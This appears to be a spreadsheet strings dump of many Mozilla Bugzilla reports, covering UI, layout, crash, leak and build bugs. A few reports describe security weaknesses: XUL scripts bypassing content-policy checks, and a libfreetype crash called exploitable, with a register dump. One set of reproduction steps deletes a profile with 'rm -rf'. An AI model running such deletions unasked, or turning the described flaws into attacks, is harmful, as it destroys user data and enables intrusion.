  <si>
    <t>this is a followup to bug 199060.</t>
  </si>
  <si>
    <t>SEAMONKEY-303142</t>
  </si>
  <si>
    <t>Wrong taskbar icon for JavaScript Console</t>
  </si>
  <si>
    <t>On Windows the taskbar correctly displays the jsconsoleWindow icon in the
JavaScript Console but on Linux you only get the default icon.</t>
  </si>
  <si>
    <t>TOOLKIT-334808</t>
  </si>
  <si>
    <t>Update wizard should care about accessKeys</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Win98 en-US rv:1.8) Gecko/20060419 Firefox/2.0a1
Build Identifier: Mozilla/5.0 (Windows U Win98 en-US rv:1.8) Gecko/20060419 Firefox/2.0a1
When updates are available 'Dowload &amp; Install Now' appears where N shows up as access key where it should be D as defined in updates.dtd. Apparently the entity is ignored and button-next-xxx.accesskey from wizard.dtd is used instead. For en-US this may not be a huge problem (as D or N both look well) but it certainly affects l10n.
The same behaviour happened for Submit Report (bug 320736) so this may need a similar fix.
Reproducible: Always</t>
  </si>
  <si>
    <t>tonnes.mb</t>
  </si>
  <si>
    <t>CORE-387182</t>
  </si>
  <si>
    <t>ASSERTION: never called in xpc_map_end.h</t>
  </si>
  <si>
    <t>Created attachment 271288
testcase
Loading the testcase triggers:
###!!! ASSERTION: never called: 'Error' file ../../../../dist/include/xpconnect/xpc_map_end.h line 162</t>
  </si>
  <si>
    <t>CORE-391423</t>
  </si>
  <si>
    <t>Reposition JS_(BEGIN|END)_EXTERN_C to avoid nesting #includes</t>
  </si>
  <si>
    <t>Created attachment 275825
hg/actionmonkey patch
This causes problems for MMgc and C++ stuff that end up in extern C {} blocks.
Attached is a patch for hg/actionmonkey but the idea would work on trunk as well.</t>
  </si>
  <si>
    <t>CORE-192128</t>
  </si>
  <si>
    <t>nsJSChannel::AsyncOpen needs help [was: WARNING in nsInputStreamChannel.cpp]</t>
  </si>
  <si>
    <t>With a Linux debug cvs trunk build form this morning plus the patch from bug
192049 and using a proxy server I get this warning when loading 
WARNING: NS_ENSURE_TRUE(mPump) failed file nsInputStreamChannel.cpp line 121
That's with shockwave installed.
I have no idea how important this is.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-441862</t>
  </si>
  <si>
    <t>Lots of machines assigned static IP addresses from the dynamic DHCP pool in the office</t>
  </si>
  <si>
    <t>I'm connected to MozillaCorp and my computer got dolske-laptop as it's name.  Reed said to file a bug.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-222910</t>
  </si>
  <si>
    <t>windermere.com - Javascript mortgage calculator uses IE syntax</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.6a) Gecko/20031015
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.6a) Gecko/20031015
The mortgage calculator allows you to alter down payment and interest to
determine monthly payment.  Right now it doesn't work.  I'm assuming bad
javascript.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>kbriscoe</t>
  </si>
  <si>
    <t>BUGZILLA-315451</t>
  </si>
  <si>
    <t>User List should have don't show disabled users option</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.12) Gecko/20050915 Firefox/1.0.7
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.12) Gecko/20050915 Firefox/1.0.7
The user list page editusers.cgi?action=list would benefit greatly
from a don't show disabled users checkbox so that one could work
with only current users in the list when desired.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>jhg</t>
  </si>
  <si>
    <t>BUGZILLA-460937</t>
  </si>
  <si>
    <t>Dependency Views</t>
  </si>
  <si>
    <t>The dependency tree is not a valid HTML5 page</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 ja-KS rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3
Build Identifier: 
HTML of dependency tree has two HTML invalid output.
1. ID of  is same as bug-id (it contains ONLY disits).
   HTML specification requires id starts with alphabet.
2. If dependency tree contains same bug twice (or more) id of  and name of  will be duplicate.
   HTML specification requires id to be UNIQUE.
3. UI elements on head of tree and bottom of tree has same id.
  e.g.  
Reproducible: Always
Steps to Reproduce:
1.Show https://bugzilla.mozilla.org/showdependencytree.cgi?id=286269&amp;hide_resolved=0
2.See HTML source
3.Check it by W3C HTML validator
Actual Results:  
Error is reported.
Expected Results:  
Error is not reported.
It may be difficult to fix duplicate id and name when tree contains same bug twice or more ( I don't have good idea of solution).</t>
  </si>
  <si>
    <t>masa141421356</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-501641</t>
  </si>
  <si>
    <t>Despot account/permissions request</t>
  </si>
  <si>
    <t>Hi
There are housekeeping bugs open on the data stored in despot (e.g. bug 396363 bug 447926) which I would like to fix. To do this I would need permission to edit data in despot. Currently I can view all data but the edit page for each partition says: You can't change anything here! You can look but you won't be permitted to touch.
Thanks
Gerv</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-184811</t>
  </si>
  <si>
    <t>addressingwidget appears as sunken not as button</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.3a) Gecko/20021210
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.3a) Gecko/20021210
The addressingwidget (containing a listbox for from: to: bcc: and the like)
does not appear like a button anymore but as sunken text field with leading
drop down button.
Reproducible: Always
Steps to Reproduce:
Expected Results:  
addressingwidget should look as button with down arrow (as in older builds ie
2002-11-26 and older).</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-488112</t>
  </si>
  <si>
    <t>Talos Suspected machine issue (2418511): Tp3 increase 8.27% on Mac105 1.9.1</t>
  </si>
  <si>
    <t>Otherwise known as qm-pleopard-talos03 it has gone from matching its peers to testing about 10% higher over the weekend.</t>
  </si>
  <si>
    <t>CORE-158266</t>
  </si>
  <si>
    <t>Mach-o build should use mac locale code</t>
  </si>
  <si>
    <t>Currently the mach-o build is using the unix locale code.  It should probably be
using the Mac locale code.</t>
  </si>
  <si>
    <t>CORE-255399</t>
  </si>
  <si>
    <t>div containing a float and clear:both is printed with incorrect height</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.2) Gecko/20040812 Firefox/0.9.1+
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.2) Gecko/20040812 Firefox/0.9.1+
A wrapper div contentarea contains a float.  A clearing element in contentarea
after the float brings back the document flow so content area actually contains
the float.  The float is several printed pages worth of content.  When print
previewing (shrink to fit for this senario others settings have the same
effect) and/or printing a bottom border on the contentarea displays at the
bottom of page 1 when really its contents go to page 7.  Content that comes
after the float in the document flow will start at page 2 overlaying the floats
content.  See the testcase attached and do a print preview.
Reproducible: Always
Steps to Reproduce:
1. view testcase
2. do print preview or print the page out
3. see where the bottom border shows up at the end of page 1
4. see where the document flow content after the float shows on page 2
5. see that 7 pages print.
Expected Results:  
It should layout correctly like the browser does.  The clear element should be
honored and document flow text at the end should be below the float and clear
element.  The bottom border should come after the float and clear element and
before the document flow text at the end.</t>
  </si>
  <si>
    <t>matt.johnson</t>
  </si>
  <si>
    <t>TOOLKIT-479095</t>
  </si>
  <si>
    <t>Blocklist Policy Requests</t>
  </si>
  <si>
    <t>Blocklist AVG SafeSearch v.8.0 (and lower) for Firefox 3.5</t>
  </si>
  <si>
    <t>Per bug 475653 version 8.0 of AVG's SafeSearch extension which is installed/registered with the AVG software breaks the location bar in Fx3.1. Specifics are in the bug but the long and the short of it is that the Enter key will no longer submit the text entered in the location bar the go arrow must be clicked on.
Because this version of the extension breaks a core navigation method in 3.1 I'd like to recommend we blocklist it. AVG has prepared a fix and will be deploying it soon but I'd still like to add version 8.0 and lower to the blocklist for Firefox 3.1 and higher.
Identifying information for the extension is as follows:
    {3f963a5b-e555-4543-90e2-c3908898db71}
    AVG Safe Search
    8.0
    2
    Guard against clicking malicious links.
    AVG Inc.</t>
  </si>
  <si>
    <t>CORE-481350</t>
  </si>
  <si>
    <t>Solve the imacros.c.out out of date problem</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #476181 +++
Splitting since a patch landed for bug 476181.
/be</t>
  </si>
  <si>
    <t>CORE-361569</t>
  </si>
  <si>
    <t>SVG gradients triggering cairo nquartz fallbacks</t>
  </si>
  <si>
    <t>With cairo-cocoa now the default SVG is trying to use nquartz for the first time.  Gradients with a non-identity transform are causing _cairo_nquartz_setup_source to fail but instead of returning DO_UNSUPPORTED this function returns CAIRO_INT_STATUS_UNSUPPORTED.
We also need to do a push/pop group on OS-X to allow the fallbacks to read pixels off the surface.</t>
  </si>
  <si>
    <t>SEAMONKEY-269308</t>
  </si>
  <si>
    <t>Mozilla should check solaris Math Library (libm) patch</t>
  </si>
  <si>
    <t>Without this patch when mozilla(Sun stadio 8 build) starup there will be an
error like
$ ld.so.1: ./firefox-bin: fatal: relocation error: file ./firefox-bin: symbol
fmod: referenced symbol not found</t>
  </si>
  <si>
    <t>CORE-448987</t>
  </si>
  <si>
    <t xml:space="preserve"> does not render focus outline</t>
  </si>
  <si>
    <t>Created attachment 332153
Testcase
 does not render focus outline
STEPS TO REPRODUCE
1. load the attached testcase
HTML4 says:
default: Specifies the entire region.
http://www.w3.org/TR/html401/struct/objects.html#edef-AREA
My interpretation is that we should render a focus outline just inside
the image edge. FWIW that's what Opera does.</t>
  </si>
  <si>
    <t>FIREFOX-507698</t>
  </si>
  <si>
    <t>random orange with leaks in mochitest-browser-chrome</t>
  </si>
  <si>
    <t>There has been a lot of random orange today with leaks in mochitest-browser-chrome.
The one I'm looking at right now:
http://tinderbox.mozilla.org/showlog.cgi?log=Firefox/1249058643.1249066833.18456.gz
Linux mozilla-central unit test on 2009/07/31 09:44:03
the stuff leaked seems like it probably includes:
  http://localhost:8888/browser/toolkit/content/tests/browser/bug471962_testpage_outer.sjs
  chrome://mochikit/content/browser-test-overlay.xul
  chrome://reporter/content/reporterOverlay.xul
  chrome://browser/content/safebrowsing/report-phishing-overlay.xul</t>
  </si>
  <si>
    <t>CORE-477979</t>
  </si>
  <si>
    <t>XUL scripts skip some security checks</t>
  </si>
  <si>
    <t>Created attachment 361729
Testcase
I experimented with different types of scripts and apparently XUL scripts don't trigger content policies. The result is for example that the scripts are loaded even though JavaScript is disabled (nsWebBrowserContentPolicy doesn't have a say about this). I attached a XUL document loading https://bugzilla.mozilla.org/js/util.js - LiveHTTPHeaders extension confirms that this script is loaded regardless of preferences.
Looking at nsXULDocument::LoadScript() the download is apparently started without any checks at all. At least further down in nsXULDocument::OnStreamComplete() there is a call to nsScriptLoader::ShouldExecuteScript() this must be the one preventing me from running a script from file:///. However if I compare to nsScriptLoader - there are additionally calls to CheckLoadURIWithPrincipal() and CheckContentPolicy() in StartLoad() both are missing for XUL scripts.</t>
  </si>
  <si>
    <t>CORE-454945</t>
  </si>
  <si>
    <t>Crash [@ nsSVGIntegrationUtils::GetInvalidAreaForChangedSource][@ nsSVGPropertyBase::GetReferencedFrame] with 2 filters and removing style</t>
  </si>
  <si>
    <t>Created attachment 338243
testcase
See testcase which crashes current trunk build within 100ms.
http://crash-stats.mozilla.com/report/index/4bb24cf3-806b-11dd-b191-0013211cbf8a?p=1
0  	 	@0x1  	
1 	xul.dll 	nsSVGIntegrationUtils::GetInvalidAreaForChangedSource 	
2 	xul.dll 	xul.dll@0x308f25 	
3 	xul.dll 	nsIFrame::Invalidate 	
4 	xul.dll 	nsFrameManager::RemoveFrame 	
5 	xul.dll 	nsCSSFrameConstructor::ContentRemoved 	
6 	xul.dll 	nsCSSFrameConstructor::RecreateFramesForContent 	
7 	xul.dll 	nsCSSFrameConstructor::ProcessRestyledFrames 	
8 	xul.dll 	nsCSSFrameConstructor::RestyleElement 	
9 	xul.dll 	nsCSSFrameConstructor::ProcessOneRestyle 	
10 	xul.dll 	nsCSSFrameConstructor::ProcessPendingRestyles 	
11 	xul.dll 	PresShell::DoFlushPendingNotifications 	
12 	xul.dll 	PresShell::FlushPendingNotifications 	
13 	xul.dll 	nsDocument::FlushPendingNotifications 	
14 	xul.dll 	nsGenericElement::GetPrimaryFrame 	
15 	xul.dll 	nsGenericElement::GetStyledFrame 	
16 	xul.dll 	nsNSElementTearoff::GetScrollInfo 	
17 	xul.dll 	nsNSElementTearoff::SetScrollLeft 	
18 	xul.dll 	NS_InvokeByIndex_P 	
19 	xul.dll 	XPCWrappedNative::CallMethod</t>
  </si>
  <si>
    <t>TOOLKIT-416205</t>
  </si>
  <si>
    <t>Update nsDownloadManager::Init from changes to mozIStorageService::OpenDatabase</t>
  </si>
  <si>
    <t>See bug 416173</t>
  </si>
  <si>
    <t>CORE-314549</t>
  </si>
  <si>
    <t>Various bugs involving containers not actually fixed for subframes</t>
  </si>
  <si>
    <t>It looks like we never unset document and prescontext containers prescontext link handlers etc for subframes when their parent goes into bfcache.  This means that bug 292960 and possibly bug 292961 are not fixed for subframes.
While this is not quite as bad as the original bug 292960 and bug 292961 it still has the basic problem that code (extensions content code session history code web pages etc) doesn't expect that sort of thing to be happening so allowing it to happen rather scares me security-wise.  Once the page a frame is in has been unloaded there should be no more traversals in that frame.
To fix this I think we need to walk the docshell tree like we do the presshell tree when putting a page in bfache and unset the containers and link handler on everything in that subtree.  Restoring needs to restore the pointers.  It should be pretty safe to do this I would think.</t>
  </si>
  <si>
    <t>CORE-503957</t>
  </si>
  <si>
    <t>RTL mixing hebrew &amp; ascii characters + display:inline = weird layout</t>
  </si>
  <si>
    <t>Created attachment 388324
html page displaying the bug
The attached page shows 4 list items one with mixed Hebrew and ascii characters the rest all ascii (we get this sort of thing on AMO).  The three all-ascii items are displayed *inside* of the mixed item.
Webkit does the same thing but it still seems like a bug to me.</t>
  </si>
  <si>
    <t>FIREFOX-480893</t>
  </si>
  <si>
    <t>Session Restore start new session does not follow startup page option</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1b3pre) Gecko/20090226 Firefox/3.1a1pre
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1b3pre) Gecko/20090226 Firefox/3.1a1pre
After selecting New Session from Session Restore dialog the browser opens my homepage in a new tab rather than following my configuration to open a blank tab on startup.
Reproducible: Always
Steps to Reproduce:
1. Set firefox to open a blank page on startup.
2. Click New Session from within session restore dialog
Actual Results:  
Opens home page url
Expected Results:  
Opens a blank tab</t>
  </si>
  <si>
    <t>richardbiddle</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-283366</t>
  </si>
  <si>
    <t>It should be possible to define the name of the 'class' attribute in XTF</t>
  </si>
  <si>
    <t>This is needed in XForms:
A host language is expected to add attributes such as xml:lang as well as an 
attribute named class that holds a list of strings that can be matched by CSS 
class selectors.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-323911</t>
  </si>
  <si>
    <t>should not play sound when new feed items arrive</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 de rv:1.8) Gecko/20051111 Firefox/1.5
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 de rv:1.8) Gecko/20051111 Firefox/1.5
Since TB 1.5 the notify sound is even played when a new news (RSS feed) comes in. This is not good because that isn't very interesting. In addition setting news.notify.on to false doesn't work... the sound is played nevertheless. Playing notify sound on RSS news should be switchable (on/off).
Reproducible: Always
Steps to Reproduce:
1. Subscribe a RSS news
2. Turn notify sound on
3. Wait til a new RSS news comes in
Actual Results:  
You hear the sound which should (and was in TB 1.0x) played when a new MAIL comes in
Expected Results:  
The news notify sound setting should be switchable/working.</t>
  </si>
  <si>
    <t>alta88</t>
  </si>
  <si>
    <t>Marsti</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-281719</t>
  </si>
  <si>
    <t>Fix wording on 410 Gone error page</t>
  </si>
  <si>
    <t>From mozilla.org's 410 Gone error page:
We are sorry the file you requested is no longer here and there is no
suitable replacement page to redirect you to.
The issues:
The quoted sentence ends with a preposition which is incorrect grammar.  I also
don't know why we refer to both file and page.  There's a congruency between
the two clauses that suggests that we use either page or file but not both.
 Additionally I believe the sentence suffers from faulty parallel syntax. 
There's nothing that sufficiently connects all three clauses such that they
belong in the same sentence.  (The wording in particular suggests that they
should be at least somewhat separated.)
A version of the error page with these issues corrected would be:
We're sorry the page you requested is no longer here and no replacement page
exists.</t>
  </si>
  <si>
    <t>FIREFOX-690455</t>
  </si>
  <si>
    <t>Sync Error Log</t>
  </si>
  <si>
    <t>Created attachment 563494
MyErrorLog
User Agent: Mozilla/5.0 (Windows U Windows NT 6.1 en-US rv:1.9.2.23) Gecko/20110920 Firefox/3.6.23 ( .NET CLR 3.5.30729 .NET4.0E)
Build ID: 20110920075126
Steps to reproduce:
Sync has stopped working
Actual results:
Sync has stopped working
Expected results:
Sync should not stop working</t>
  </si>
  <si>
    <t>mberner1</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-312476</t>
  </si>
  <si>
    <t>rss feed export to opml does not preserve article summary setting</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux x86_64 en-US rv:1.9a1) Gecko/20051014 Firefox/1.6a1
Build Identifier: Mozilla/5.0 (X11 U Linux x86_64 en-US rv:1.9a1) Gecko/20051014 Firefox/1.6a1
Manage Subscriptions Export (default filename is MyThunderbirdFeeds.opml I
don't know if there is another choice) does not preserve the show article
summary instead of loading web page setting. This means restoring RSS
subscriptions across Thunderbird profiles is painful.
Reproducible: Always
Steps to Reproduce:
1. Subscribe to an RSS feed ensuring that article summary box is checked
2. Manage Subscriptions Export MyThunderbirdFeeds.opml
3. rm -rf ~/.thunderbird
4. Restart Thunderbird
5. Manage Subscriptions Import MyThunderbirdFeeds.opml
6. Observe article summary is not honored</t>
  </si>
  <si>
    <t>SEAMONKEY-98805</t>
  </si>
  <si>
    <t>[turbo] Need confirmation dialog when Disable QuickLaunch systray icon menu choice is selected</t>
  </si>
  <si>
    <t>Once we've made the leap to turning on QuickLaunch mode by default during
installation we will need to make it easy for users to turn this off (so they
can get rid of that mysterious icon that then appears in their system tray). 
This is covered by bug 98770.
This bug says that in addition that menu choice should first display a
confirmation dialog worded along the lines of:
  You have chosen to turn off Mozilla/Netscape QuickLaunch.  This will increase   
  the time it takes to open this application.  Are you sure?  If you say Yes 
  then to turn QuickLaunch mode back on you must go to Preferences|Advanced and 
  select the QuickLaunch checkbox.</t>
  </si>
  <si>
    <t>TESTING-808783</t>
  </si>
  <si>
    <t>Get green set of Mn tests running on cedar so we can get them going on m-c</t>
  </si>
  <si>
    <t>We've had Mn tests running on cedar for quite some time. There are still some random oranges. We should try to get them green or failing that just get a small subset of them running on m-c
https://tbpl.mozilla.org/?tree=Cedar</t>
  </si>
  <si>
    <t>ahal</t>
  </si>
  <si>
    <t>CORE-333861</t>
  </si>
  <si>
    <t>font-size: 131131px causes crash via libfreetype.so with very scary registers.</t>
  </si>
  <si>
    <t>font-size: 131131px causes crash via libfreetype.so with very scary
registers.
macosx ppc and wine seem unaffected.
trunk only ff 15 seems unaffected.
may be a duplicate of Bug 322345 but is exploitable from html.
Program received signal SIGSEGV Segmentation fault.
[Switching to Thread 46912558994496 (LWP 4831)]
0x00002aaaad7cc540 in memset () from /lib64/tls/libc.so.6
(gdb) info stack
#0  0x00002aaaad7cc540 in memset () from /lib64/tls/libc.so.6
#1  0x00002aaaac66a172 in gray_raster_render ()
   from /usr/lib64/libfreetype.so.6
#2  0x00002aaaac668e5a in ps_hints_apply () from /usr/lib64/libfreetype.so.6
#3  0x00002aaaac6697f1 in gray_raster_render ()
   from /usr/lib64/libfreetype.so.6
#4  0x00002aaaac62f5f4 in FT_Outline_Render () from /usr/lib64/libfreetype.so.6
#5  0x00002aaaac62f69e in FT_Outline_Get_Bitmap ()
   from /usr/lib64/libfreetype.so.6
#6  0x00002aaaaae78aa1 in _render_glyph_outline (face=0x11b78c0 
    font_options=0x10b9b58 surface=0x7fffff833518)
    at /opt/joro/firefox/mozilla/gfx/cairo/cairo/src/cairo-ft-font.c:1014
#7  0x00002aaaaae79c17 in _cairo_ft_scaled_glyph_init (
    abstract_font=0x10b9ae0 scaled_glyph=0x10b9ea0 info=3)
    at /opt/joro/firefox/mozilla/gfx/cairo/cairo/src/cairo-ft-font.c:1817
#8  0x00002aaaaae623dc in _cairo_scaled_glyph_lookup (scaled_font=0x10b9ae0 
(gdb) x/i $rip
0x2aaaad7cc540 :     mov    %sil(%rdi)
(gdb) info reg
rax            0x2aaab527c9ab   46912672090539
rbx            0x11b574e        18569038
rcx            0x101010101010101        72340172838076673
rdx            0x1      1
rsi            0x6c6c6c6c6c6c6c6c       7812738666512280684
rdi            0x2aaab527c9ab   46912672090539
rbp            0x1      0x1
rsp            0x7fffff832e78   0x7fffff832e78
r8             0x2aaaac66a100   46912525213952
r9             0x100    256
r10            0x4a     74
r11            0x11b01c0        18547136
r12            0x2aaab5279e88   46912672079496
r13            0x2      2</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-355033</t>
  </si>
  <si>
    <t>Keychain password prefs need clarification</t>
  </si>
  <si>
    <t>There are a couple of issues with the password prefs:
- The preference Auto-fill passwords in web forms isn't accurately named as it also controls prefill of any gecko-originated password prompts (such as the ones you get for HTTP-auth).
- The dual-prefs seem odd in general. I don't see a real use-case for wanting to store passwords but not fill them (I thought we'd discussed this before but I can't find anything).
I think we should just have one check box that is something like:
_ Auto-fill passwords in web forms from the Keychain
and that it should only control web forms--the password prompts from Gecko will toss up a sheet regardless so there's not really any added cost to always showing the checkbox (which we do anyway causing confusion like bug 318146).</t>
  </si>
  <si>
    <t>SOCORRO-520230</t>
  </si>
  <si>
    <t>Socorro - extension table columns are too short</t>
  </si>
  <si>
    <t>some extensions have version numbers that are longer than the 16 character limit.  These are getting truncated as they are inserted into the database.
The solution is to change the length of the column in the database and then remove the truncation on line 745 of processor.py</t>
  </si>
  <si>
    <t>griswolf</t>
  </si>
  <si>
    <t>FIREFOX_GRAVEYARD-368252</t>
  </si>
  <si>
    <t>notify observers when a microsummary gets updated</t>
  </si>
  <si>
    <t>In order to better enable extensions (and core code) to extend microsummary functionality it would be useful to broadcast a notification (via the observer service most likely) when a live title gets updated so that extensions can do additional work at that point.
For example an extension could use this to flash the live title or otherwise (f.e. using growl) bring the update to the attention of the user.
And an extension that allows users to specify refresh intervals for individual live titles might then modify the live title's expiration time from the default assigned by the microsummary service.
One question is whether it would make sense to additionally notify observers before initiating the update request (and giving them the opportunity to cancel or otherwise modify it) i.e. something like a microsummary-before-update notification in addition to a microsummary-after-update one.
Another issue is what to pass in the aSubject and someData parameters to nsIObserverService::notifyObservers.  Currently an nsIMicrosummary has no knowledge about the live title it's being used for (if any).  So just passing it as the value of the aSubject parameter doesn't give the observer enough information.
We could additionally pass the bookmark ID as the value of someData but that seems clunky.  Seems like we're going to have to either make nsIMicrosummary smarter about what it's being used for (bookmark label page tab label etc.) or pass some other object referencing both the nsIMicrosummary and the thing using it (nsIMicrosummaryConsumer?).
There may be additional notifications that it would be useful to broadcast but let's focus this bug on this particular one (or two) which has clear utility and use separate bugs for other potentially useful notifications.</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-192146</t>
  </si>
  <si>
    <t>update QA contacts for profile and installer components</t>
  </si>
  <si>
    <t>need to update the QA contact (change to gbush@netscape.com) for the browser:
profile and browser: installer components.
i'll get to this today.</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-131498</t>
  </si>
  <si>
    <t>Can't join a channel with Japanese name</t>
  </si>
  <si>
    <t>Can't join a channel with Japanese name.
But RFC1459 allows Japanese channel name.
http://www.rfc.net/rfc1459.html
1.3 Channels
****************************************
Channels names are strings (beginning with a '&amp;' or '#' character) of
length up to 200 characters.  Apart from the the requirement that the
first character being either ' the only restriction on a
channel name is that it may not contain any spaces (' ') a control G
(^G or ASCII 7) or a comma ('' which is used as a list item
separator by the protocol).
****************************************</t>
  </si>
  <si>
    <t>CORE-333942</t>
  </si>
  <si>
    <t>Implement GetNodeParent</t>
  </si>
  <si>
    <t>We should move nsIContent::GetParent to nsINode since that might save some casting when nsINode becomes more widely used. Additionally we should add a function that returns the parent as an nsINode which would return a non-null value even when the parent is a document or an attribute.</t>
  </si>
  <si>
    <t>CORE-303548</t>
  </si>
  <si>
    <t>Viewing page with SWF/Flash or PDF disables Print Options/PrintPDE.plugin</t>
  </si>
  <si>
    <t>In yet another wierd plugin interaction bug... :-( (not sure whether this really
belongs in printing or plugins either)
In Camino 2005080408 (v0.9a2+) viewing a page with Flash or viewing a PDF (via
PDF Browser Plugin) at any point in your browser session disables the Camino
aka Print Options pane (generated by the PrintPDE.plugin) in the Print
dialogue from there on out.
After viewing a Flash object the Camino item simply vanishes from the list
after viewing a PDF the PDF Browser Plugin pane appears in the list twice
(and selecting either shows not available if the page to be printed is not a PDF).
Unfortunately this is not reproducible 100% of the time but 7/10 times it seems
to happen.  It's also possible that other plugins may do this too but as of
yet I've been unable to cause it to happen with JEP QuickTime or Adobe SVG.
http://www.macromedia.com
http://www.tug.org/tex-archive/macros/latex/contrib/sides/sides-sample.pdf</t>
  </si>
  <si>
    <t>CORE-16491</t>
  </si>
  <si>
    <t>pref_InitInitialObjects() leaks</t>
  </si>
  <si>
    <t>In mozilla/modules/libpref/src/nsPref.cpp in pref_InitInitialObjects around
line # 1094 nsIFileSpec *defaultPrefDir is obtained from the nsIFileLocator
service but never released thus causing a leak. Please fix... either switch to
using a nsCOMPtr (probably preferred) or add a NS_RELEASE(defaultPrefDir) in the
appropriate spot.
[Note: leak detected using beard's Boehm GC]</t>
  </si>
  <si>
    <t>neeti</t>
  </si>
  <si>
    <t>CORE-89214</t>
  </si>
  <si>
    <t>Caret in URL Bar is left visible without focus</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (X11 U Linux i686 en-US rv:0.9.2) Gecko/20010628
BuildID:    2001062823
There is a trailing URL Bar caret when the Search SideBar tab is opened. Trying
to type shows that the URL Bar does not have focus. The URL Bar caret should be
removed when the URL Bar does not have focus.
You may have to perform the following steps a number of times for the bug to be
visible since the caret is blinking in the URL Bar although if your timing was
good you could probably reproduce every time.
Reproducible: Always
Steps to Reproduce:
1. Show the SideBar.
2. Hide the Search SideBar tab.
3. Click in the URL Bar and notice a blinking caret.
4. Show the Search SideBar tab using Tabs-&gt;Search
5. Try typing.
6. Click in the URL Bar at a position different from the position in step 3.
Actual Results:  The caret is visible while the URL Bar does not have focus
(shown by typing in step 5). This superfluous caret will remain while a second
one appears (after step 6).
Expected Results:  The URL Bar caret should not be visible when the URL Bar does
not have focus. The URL Bar should not have caret trails.</t>
  </si>
  <si>
    <t>jamacht</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-310962</t>
  </si>
  <si>
    <t>Multiple schema types for a node not being processed correctly</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a1) Gecko/20051003 Firefox/1.6a1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a1) Gecko/20051003 Firefox/1.6a1
6.2.1 of spec states that the order for schema types is:
1. xml schema associated with instance (don't think it is supported yet)
2. xsi:type on the instance element
3. xforms type on a bind
4. default to an xsd:string
At present the processor will apply rule 4. if rule 2. is not met and when a
type is assigned on a bind rule 3. results in a duplicate MIP property error in
the javascript error log.
Working on a patch will upload when complete.
Reproducible: Always</t>
  </si>
  <si>
    <t>peter.nunn</t>
  </si>
  <si>
    <t>CORE-385716</t>
  </si>
  <si>
    <t>inIFlasher.drawElementOutline and inIFlasher.repaintElement aren't null safe [@ inLayoutUtils::GetWindowFor]</t>
  </si>
  <si>
    <t>i was trying to use it from js and accidentally passed null.
firefox!inLayoutUtils::GetWindowFor(class nsIDOMNode * aNode = 0x00000000)+0x14 [e:\builds\tinderbox\fx-trunk\winnt_5.2_depend\mozilla\layout\inspector\src\inlayoututils.cpp @ 60]
firefox!inFlasher::DrawElementOutline(class nsIDOMElement * aElement = 0x00000000)+0xf [e:\builds\tinderbox\fx-trunk\winnt_5.2_depend\mozilla\layout\inspector\src\inflasher.cpp @ 152]
xpcom_core!NS_InvokeByIndex_P(class nsISupports * that = 0x01908a78 unsigned int methodIndex = 9 unsigned int paramCount = 1 struct nsXPTCVariant * params = 0x0012d340)+0x27</t>
  </si>
  <si>
    <t>BUGZILLA-529573</t>
  </si>
  <si>
    <t>Tabular reports do not show empty resolution</t>
  </si>
  <si>
    <t>Created attachment 413110
Tip
Report with resolution as an axis leaves out the '---' or empty resolution.
This is a regression from bug 528262.</t>
  </si>
  <si>
    <t>CORE-37395</t>
  </si>
  <si>
    <t>nsString::IsASCII return true for non ASCII</t>
  </si>
  <si>
    <t>The implementation of nsString::IsASCII is wrong. The ASCII range is only from
U+0000 to U+007F. However the current implementation define it as
U+0000 to U+00FF. We should change the implementation so it will return
false from U+0080 to U+00FF even for the eOneByte case
2071 PRBool nsString::IsASCII(const PRUnichar* aBuffer) {
2072
2073 if(!aBuffer) {
2074 aBuffer=mUStr
2075 if(eOneByte==mCharSize)
2076 return PR_TRUE
2077 }
2078 if(aBuffer) {
2079 while(*aBuffer) {
2080 if(*aBuffer&gt;255){
2081 return PR_FALSE
2082 }
2083 aBuffer++
2084 }
2085 }
2086 return PR_TRUE
2087 }
2088
Fortunately there are no code call this API yet. So it should not be a big
deal to fix it now.</t>
  </si>
  <si>
    <t>NSS-409236</t>
  </si>
  <si>
